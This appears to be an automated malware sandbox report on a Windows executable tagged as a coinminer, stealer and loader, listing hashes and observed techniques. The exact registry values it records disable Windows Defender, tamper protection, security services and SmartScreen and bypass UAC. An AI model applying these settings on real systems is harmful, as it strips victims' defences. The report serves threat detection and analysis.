Analysis
-
max time kernel
150s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
27/03/2025, 07:52
Behavioral task
behavioral1
Sample
2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
Resource
win10v2004-20250314-en
General
-
Target
2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe
-
Size
15.7MB
-
MD5
06d8029fd7cb9f12d121f936433c191d
-
SHA1
eb456ebc23601b2290f627a292c638d3bd73f9b3
-
SHA256
325fec27cfd9bacb93e2fe9f984a65adb886b6dcfbe6955404571419569e30f4
-
SHA512
05fae54f2971c2e57a38bfaddedfafad16312890449425f09792fa6efde62de4dfaa3ef7a12a90b5ab246303ba96fab82cd1d43c71eeb348453a1d47923d782d
-
SSDEEP
196608:xAACNbhcF1WKW6whfOjGvAWHMMH1OAY8PyedZLOOW7j7XlivZqOXmtubmxl5ppr6:xAAghcflGvF0t7iZqptmmH5Hm
Malware Config
Signatures
-
Contains code to disable Windows Defender 3 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x00070000000242de-12.dat disable_win_def behavioral2/files/0x00080000000242e1-45.dat disable_win_def behavioral2/files/0x00080000000242de-102.dat disable_win_def -
Disables service(s) 3 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" reg.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 28 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableInformationProtectionControl = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIntrusionPreventionSystem = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" reg.exe -
Modifies Windows Defender notification settings 3 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\DisableAntiSpyware = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\DisableAntiSpyware = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
XMRig Miner payload 3 IoCs
resource yara_rule behavioral2/memory/3068-11-0x0000000000400000-0x00000000013B8000-memory.dmp xmrig behavioral2/files/0x00070000000242dc-579.dat family_xmrig behavioral2/files/0x00070000000242dc-579.dat xmrig -
Xmrig family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs
Run Powershell and hide display window.
pid Process 5572 powershell.exe 4756 powershell.exe 872 powershell.exe 6100 powershell.exe 1004 powershell.exe 3236 powershell.exe 2300 powershell.exe 4000 powershell.exe 1668 powershell.exe 4516 powershell.exe 4688 powershell.exe 628 powershell.exe 5316 powershell.exe 1272 powershell.exe 2512 PowerShell.exe 3496 powershell.exe 4840 powershell.exe 3660 powershell.exe 5772 powershell.exe 1152 powershell.exe 3096 powershell.exe 2036 powershell.exe 2396 powershell.exe 1108 powershell.exe 6100 powershell.exe 3088 powershell.exe 752 powershell.exe 6020 powershell.exe 5204 powershell.exe 3780 powershell.exe 5372 powershell.exe 4652 powershell.exe -
Disables Task Manager via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe\Debugger = "%windir%\\System32\\taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe\Debugger = "%windir%\\System32\\taskkill.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smartscreen.exe reg.exe -
Modifies Windows Firewall 2 TTPs 18 IoCs
pid Process 4764 netsh.exe 3480 netsh.exe 4536 netsh.exe 3940 netsh.exe 1812 netsh.exe 4780 netsh.exe 3460 netsh.exe 5896 netsh.exe 4044 netsh.exe 3380 netsh.exe 212 netsh.exe 1508 netsh.exe 3688 netsh.exe 5488 netsh.exe 4088 netsh.exe 4324 netsh.exe 4516 netsh.exe 624 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 4020 takeown.exe 4940 icacls.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Intel(R) Utiliti\ImagePath = "\"C:\\ProgramData\\IntelSvc.exe\" w -sid 1" reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Intel(R) Utiliti\ImagePath = "\"C:\\ProgramData\\IntelSvc.exe\" w -sid 1" reg.exe -
Stops running service(s) 4 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation IntelSvc.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TeamViewer_Service.lnk powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 3780 IntelSvc.exe 4848 IntelSvc.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 4020 takeown.exe 4940 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini attrib.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Modifies Security services 2 TTPs 20 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" reg.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\SysWOW64\en\sc.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\sc.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\cm.avi cmd.exe File created C:\Windows\SysWOW64\en\In.avi cmd.exe File created C:\Windows\SysWOW64\en\cm.avi cmd.exe File opened for modification C:\Windows\SysWOW64\en\AuthFWSnapIn.Resources.dll attrib.exe File opened for modification C:\Windows\SysWOW64\en\AuthFWWizFwk.Resources.dll attrib.exe File opened for modification C:\Windows\SysWOW64\en\In.avi cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 2564 tasklist.exe 1224 tasklist.exe -
resource yara_rule behavioral2/files/0x00080000000242d8-581.dat upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\L2cache attrib.exe -
Launches sc.exe 12 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1260 sc.exe 1448 sc.exe 5232 sc.exe 2012 sc.exe 3432 sc.exe 812 sc.exe 4520 sc.exe 3424 sc.exe 1888 sc.exe 3372 sc.exe 1800 sc.exe 6004 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xcopy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language find.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language takeown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-27_06d8029fd7cb9f12d121f936433c191d_black-basta_coinminer_darkgate_hijackloader_luca-stealer_magniber.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 336 PING.EXE 3460 PING.EXE 4448 PING.EXE 5032 PING.EXE 5552 PING.EXE 5972 PING.EXE 3392 PING.EXE 5728 PING.EXE -
Checks processor information in registry 2 TTPs 11 IoCs
Processor information is often read in order to detect sandboxing environments.
